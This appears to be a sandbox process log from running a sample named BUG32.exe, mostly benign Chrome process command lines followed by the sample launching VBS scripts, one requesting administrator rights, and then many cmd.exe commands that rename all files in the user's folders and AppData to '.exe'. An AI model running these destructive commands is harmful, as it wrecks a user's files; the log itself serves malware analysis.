"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4612 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4964 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4740 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2596 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4848 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=1656 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=3260 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4332 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=4588 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=3104 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5124 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5300 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5496 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3176 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3116 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5600 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=5664 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6012 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5960 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=6112 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=6016 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=5348 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=5236 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5132 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5524 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5944 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=5476 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=5524 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=4932 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=6052 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=5524 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=5708 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=5712 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=3292 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=5208 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=4976 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4792 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4376 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=4452 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=6088 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=5724 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=5364 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5224 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1668 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=4596 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=5988 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=2372 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=5876 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5756 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4348 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --mojo-platform-channel-handle=1624 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --mojo-platform-channel-handle=5388 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=5580 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=5052 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=3348 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --mojo-platform-channel-handle=5412 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5500 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4024 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5908 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5116 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5764 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2596 --field-trial-handle=1924,i,3022626011612990981,15975943696323145175,131072 /prefetch:8

C:\Users\Admin\Downloads\BUG32.exe

"C:\Users\Admin\Downloads\BUG32.exe"

C:\Windows\system32\wscript.exe

"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\1DCC.tmp\1DCD.vbs

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" "C:\BUG32\admin.vbs"

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" "C:\bug32\jaq.vbs" RunAsAdministrator

C:\Program Files (x86)\Windows Media Player\wmplayer.exe

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c dir "C:\Users\Admin\" /s/b/o:n/a:d > "C:\BUG32\list.lnk" & echo :ok:>>"C:\bug32\list.lnk"

C:\Program Files (x86)\Windows Media Player\setup_wm.exe

"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"

C:\Windows\SysWOW64\unregmp2.exe

"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon

C:\Windows\system32\unregmp2.exe

"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\3D Objects\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Application Data\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Contacts\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Cookies\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Desktop\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Documents\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Downloads\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Favorites\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Links\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Local Settings\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Music\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\My Documents\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\NetHood\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\OneDrive\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Pictures\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\PrintHood\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Recent\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Saved Games\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Searches\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\SendTo\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Start Menu\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Templates\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Videos\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Application Data\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\D3DSCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\History\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\PeerDistRepub\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\PlaceholderTileLogoFolder\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Publishers\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temporary Internet Files\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Color\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\Cache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\ToolsSearchCacheRdr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\Unistore\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\UnistoreDB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\Unistore\data\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\Unistore\data\temp\*.*" "*.exe"

C:\Windows\System32\cmd.exe

